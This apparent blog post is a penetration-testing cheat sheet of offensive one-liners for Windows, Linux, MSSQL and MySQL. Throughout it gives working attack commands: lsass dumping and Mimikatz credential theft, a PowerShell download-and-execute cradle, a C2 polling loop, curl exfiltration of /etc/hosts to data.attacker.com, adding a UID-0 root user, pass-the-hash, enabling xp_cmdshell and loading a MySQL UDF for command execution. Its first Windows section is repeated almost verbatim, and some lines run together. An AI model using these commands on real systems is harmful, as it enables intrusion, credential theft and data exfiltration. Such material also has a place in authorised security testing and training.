Windows
List Domain Controller
nltest /dsgetdc:domainname (does not work for XP)
net groups /domain
Pull system info
System info
Determine OS architecture
Wmic os get osarchitecture
Ping sweep
for /L %i in (1,1,255) do @ping -n 1 192.168.1.%i -w 100 | findstr "Reply"
Determine OS Version
systeminfo | findstr /B /C:"OS Name"
Show all available shares
for /f %a in ('net view ^| findstr "\\"') do net view %a
Start new process from shell
start cmd.exe /c whoami
Determine PowerShell architecture
[intptr]::size (4=32, 8=64)
Dump Wireless Config
netsh wlan export profile name="Free Viruses Here" key="clear"
Offline Mimi
procdump.exe -accepteula -ma lsass.exe ldump
sekurlsa::Minidump ldump.dmp
sekurlsa::logonPasswords
Yay
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://127.0.0.1/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
CC
while (1) {$bob=((new-object net.webclient).downloadstring('http://ip/file')); if ($bob | select-string "WARNING") {echo "good"} else {echo "bad"}; sleep(60)}
Get Domain Controllers (PowerShell)
[system.directoryservices.activedirectory.domain]::getcurrentdomain().domaincontrollers
Exfil via PS
powershell.exe "$data = $host.version; $ip = 'http://192.168.1.1/'; $url = echo $ip$data; (new-object System.Net.WebClient).Downloadfile($url, 'nc.exe')"
Enum File Shares via PS
PS> dir \sharename -Recurse -Include *.txt,*.vbs,*.ps1,*.xml | Select-String -Pattern “username|password”
Level Up
exploits
dir /b /s unattend.xml
dir /b /s sysprep.inf
dir /b /s sysprep.xml
dir /b /s wdscapture.inf (win2k8)
dir /b /s *pass*
weak service perms
unquoted service paths
unquoted autoruns
weak directory perms for dll attack
weak binary perms
schtasks /query /fo list /v
AlwaysInstallElevated
echo %PATH%
accesschk.exe -p -f * | findstr -i "seassign setake sedebug seimpersonate"
findstr /S cpassword \\dc1.corp.com\sysvol\*.xml
ms14-068
kerberoast
WRITE_DAC
--------
Dump Credential Manager
PSRemoting/WinRM with Explicit Creds via MSF
meterpreter > load powershell
Loading extension powershell...Success.
meterpreter > powershell_shell
PS > $user = "DOMAIN\user"
PS > $pwd = "password123"
PS > $p = ConvertTo-SecureString $pwd -AsPlainText -Force
PS > $c = New-object -typename System.management.automation.pscredential -argumentlist $user, $p
PS > connect-wsman -credential $c -computername hostname.domain.local
PS > cd wsman:
PS > ls
PSConsole History
type %userprofile%\AppData\Roaming\Microsoft\Windows\Powershell\PSReadline\Consolehost_history.txt
Pull AD properties using alternate creds via PowerView
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force;
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword);
Get-DomainObject -Credential $Cred -Identity 'windows1'
AD Password Policy via RSAT
Enumerate LAPS Permission Config
https://github.com/leoloobeek/LAPSToolkit
https://github.com/kfosaaen/Get-LAPSPasswords
PowerUpSQL to Enumerate accessible DBs w/domain creds
PowerUpSQL to test vendor creds
PowerUpSQL to test command exec/sysadmin role
$Accessible | Invoke-SQLOSCmd –Verbose –Command “whoami” –Threads 10
PowerUpSQL to leak service hashes
$accessible |Get-SQLQuery -verbose -query "xp_dirtree '\\ip\test.txt'"
List Domain Controller
nltest /dsgetdc:domainname (does not work for XP)
net groups /domain
Pull system info
System info
Determine OS architecture
Wmic os get osarchitecture
Ping sweep
for /L %i in (1,1,255) do @ping -n 1 192.168.1.%i -w 100 | findstr "Reply"
Determine OS Version
systeminfo | findstr /B /C:"OS Name"
Show all available shares
for /f %a in ('net view ^| findstr "\\"') do net view %a
Start new process from shell
start cmd.exe /c whoami
Determine PowerShell architecture
[intptr]::size (4=32, 8=64)
Dump Wireless Config
netsh wlan export profile name="Free Viruses Here" key="clear"
Offline Mimi
procdump.exe -accepteula -ma lsass.exe ldump
sekurlsa::Minidump ldump.dmp
sekurlsa::logonPasswords
Yay
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://127.0.0.1/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
CC
while (1) {$bob=((new-object net.webclient).downloadstring('http://ip/file')); if ($bob | select-string "WARNING") {echo "good"} else {echo "bad"}; sleep(60)}
Get Domain Controllers (PowerShell)
[system.directoryservices.activedirectory.domain]::getcurrentdomain().domaincontrollers
Exfil via PS
powershell.exe "$data = $host.version; $ip = 'http://192.168.1.1/'; $url = echo $ip$data; (new-object System.Net.WebClient).Downloadfile($url, 'nc.exe')"
Enum File Shares via PS
PS> dir \sharename -Recurse -Include *.txt,*.vbs,*.ps1,*.xml | Select-String -Pattern “username|password”
Level Up
exploits
dir /b /s unattend.xml
dir /b /s sysprep.inf
dir /b /s sysprep.xml
dir /b /s wdscapture.inf (win2k8)
dir /b /s *pass*
post/multi/recon/local_exploit_suggester
weak service perms
unquoted service paths
unquoted autoruns
weak directory perms for dll attack
weak binary perms
schtasks /query /fo list /v
AlwaysInstallElevated
echo %PATH%
accesschk.exe -p -f * | findstr -i "seassign setake sedebug seimpersonate"
findstr /S cpassword \\dc1.corp.com\sysvol\*.xml
ms14-068
kerberoast
WRITE_DAC
--------
cacls /e /g domain\user:F
Dump Credential Manager
vaultcmd /listcreds:"Windows Credentials" /allPSRemoting/WinRM with Explicit Creds via MSF
meterpreter > load powershell
Loading extension powershell...Success.
meterpreter > powershell_shell
PS > $user = "DOMAIN\user"
PS > $pwd = "password123"
PS > $p = ConvertTo-SecureString $pwd -AsPlainText -Force
PS > $c = New-object -typename System.management.automation.pscredential -argumentlist $user, $p
PS > connect-wsman -credential $c -computername hostname.domain.local
PS > cd wsman:
PS > ls
PSConsole History
type %userprofile%\AppData\Roaming\Microsoft\Windows\Powershell\PSReadline\Consolehost_history.txt
Pull AD properties using alternate creds via PowerView
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force;
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword);
Get-DomainObject -Credential $Cred -Identity 'windows1'
AD Password Policy via RSAT
Get-ADDefaultDomainPasswordPolicy -Server 192.168.1.5Enumerate LAPS Permission Config
https://github.com/leoloobeek/LAPSToolkit
https://github.com/kfosaaen/Get-LAPSPasswords
PowerUpSQL to Enumerate accessible DBs w/domain creds
$Accessible = Get-SQLInstanceDomain –Verbose | Get-SQLConnectionTestThreaded –Verbose –Threads 10 | Where-Object {$_.Status –eq 'Accessible'}
PowerUpSQL to test vendor creds
Get-SQLInstanceDomain -Verbose | Get-SQLServerLoginDefaultPw -Verbose
PowerUpSQL to test command exec/sysadmin role
$Accessible | Invoke-SQLOSCmd –Verbose –Command “whoami” –Threads 10
PowerUpSQL to leak service hashes
$accessible |Get-SQLQuery -verbose -query "xp_dirtree '\\ip\test.txt'"
PTH
sekurlsa::pth /user:USERNAME /domain:DOMAIN /ntlm:HASH /run:COMMAND
Share/File Finder
Find-DomainShare -CheckShareAccess 2>$null | % {'\\' +
$_.ComputerName + '\' + $_.Name} | sls -Pattern 'print\$'
-NotMatch | Out-File accessible-file-shares.txt
$_.ComputerName + '\' + $_.Name} | sls -Pattern 'print\$'
-NotMatch | Out-File accessible-file-shares.txt
Invoke-ShareFinder -Ping -CheckShareAccess -Verbose | Out-File -Encoding ascii found_shares.txt
Invoke-FileFinder -ShareList .\found_shares.txt -OutFile found_files.csv
Linux
Ping Sweep
for ((i=1; i<255; i++)) do ping -c 1 192.168.1.$i | grep "64 bytes"; done
Add new root user
useradd -o -u 0 [username]
Upgrade from a Shell to TTY via Python
python -c 'import pty;pty.spawn("/bin/bash")'
Find setuid/setgid Binaries
find / -perm +6000 -type f -exec ls -ld {} \; > setuid.txt
find / -type f -perm -4000 -o -perm -2000
ID System
cat /etc/lsb-release -- Ubuntu
cat /etc/redhat-release -- Redhat
Grep Folder
grep -ir "pass" ./*
SSH/Run CMD
ssh secret@127.0.0.1 -i key -p 22 'cat flag.txt'
Exfil via HTTP
file=`cat /etc/hosts`;curl --data "$file" http://data.attacker.com
MSSQL
Useful stored procedures
xp_cmdshell
xp_dirtree
xp_fileexist
xp_cmdshell 2005/2008
EXEC+master..sp_configure+'show+advanced+options',1;+RECONFIGURE+WITH+OVERRIDE;+EXEC+master..sp_configure+'xp_cmdshell',0;+RECONFIGURE+WITH+OVERRIDE;+EXEC+sp_configure+'show+advanced+options',0;+RECONFIGURE+WITH+OVERRIDE
MySQL
/var/lib/mysql/mysql/user.MYD
cat /etc/my.cnf | grep user
cat /etc/mysql/my.cnf | grep user
select @@plugin_dir
select 'x' into dumpfile 'c:\\mysql\\lib\\plugin::$INDEX_ALLOCATION'
UDF
select load_file('/etc/mysql/my.cnf');
# MySQL < 5.1 /usr/lib # MySQL >= 5.1 /usr/lib/mysql/pluginuse mysql;
create table foo(line blob);
insert into foo values(load_file('/tmp/lib_mysqludf_sys.so'));
select * from foo into dumpfile '/usr/lib/lib_mysqludf_sys.so';
CREATE FUNCTION lib_mysqludf_sys_info RETURNS string SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_get RETURNS string SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_set RETURNS int SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_bineval RETURNS int SONAME 'lib_mysqludf_sys.so';
Misc
NTDS.dit
secretsdump.py -system SYSTEM -ntds ntds.dit LOCAL
Dump metasploit output to a file
Spool filename.txt
Spool off
Create Java WAR file
jar cvf boom.war boom.jsp
Use Aircrack-ng to create WPA handshake file for cracking with Hashcat
--Will create file called handshake.hccap
Aircrack-ng /tmp/handshake.cap -J handshake
Find juicy domain info
C:\>dir \\{domain}\SYSVOL\ /b /s | findstr /i "groups.xml services.xml
scheduledtasks.xml printers.xml drives.xml datasources.xml"
Crack NetLM Hashes
./rcracki_mt -h [first16ofhash] [RTable files]
opt/metasploit/tools/halflm_second.rb -n [NetLM HASH -p [first7] -s [Challenge seed]
Pesky Shellcode Chars
msfencode -b 'x00x0ax0d'
Run a DLL
Rundll32 c:\program.dll, @DllMain12
Malware Dropper/Payload Extensions
- .vbs, .vba, .vbe, .vb
- .wsh, .wsf, .wsc, .ws
- .js, .jse
- .hta (mshta.exe)
Remote access ports
set ports 21,22,23,25,135,139,443,445,3389,80,5985,5986
VNC? RLY?
RealVNC
HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\vncserver
Value: PasswordTightVNC
HKEY_CURRENT_USER\Software\TightVNC\Server
Value: Password or PasswordViewOnly
TigerVNC
HKEY_LOCAL_USER\Software\TigerVNC\WinVNC4
Value: Password
UltraVNC
C:\Program Files\UltraVNC\ultravnc.ini
Value: passwd or passwd2
Read More: https://www.raymond.cc/blog/crack-or-decrypt-vnc-server-encrypted-password/
Sploitz
Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation ExploitLinux Kernel <= 2.6.36-rc8 RDS privilege escalation exploit
Linux Kernel udev < 141 Local Privilege Escalation ExploitLinux Kernel 2.4/2.6 - sock_sendpage() Local root Crypto
OpenSSL AES Decrypt
openssl aes-256(128)-cbc -K 'key' -iv 'iv' -d -in secret.txt.enc -out plain.txt
OpenSSL AES Encrypt
openssl aes-256(128)-cbc -K 'key' -iv 'iv' -e -in secret.txt -out plain.txt.enc
Strong Algorithms
bcrypt
PBKDF2
scrypt
Web
LFI to RCE
logs (apache/ssh/error/etc)
php://input
/proc/self/environ
file descriptors (/proc/self/fd/[0-255] || /proc/self/cmdline )
Links
Example Hashes
https://hashcat.net/wiki/doku.php?id=example_hashes
LFI/RFI Cheat Sheet
http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/
Python Tools
https://github.com/dloss/python-pentest-tools
CTF Tools
http://delimitry.blogspot.co.uk/2014/10/useful-tools-for-ctf.html
CTF Tools
http://delimitry.blogspot.co.uk/2014/10/useful-tools-for-ctf.html
No comments:
Post a Comment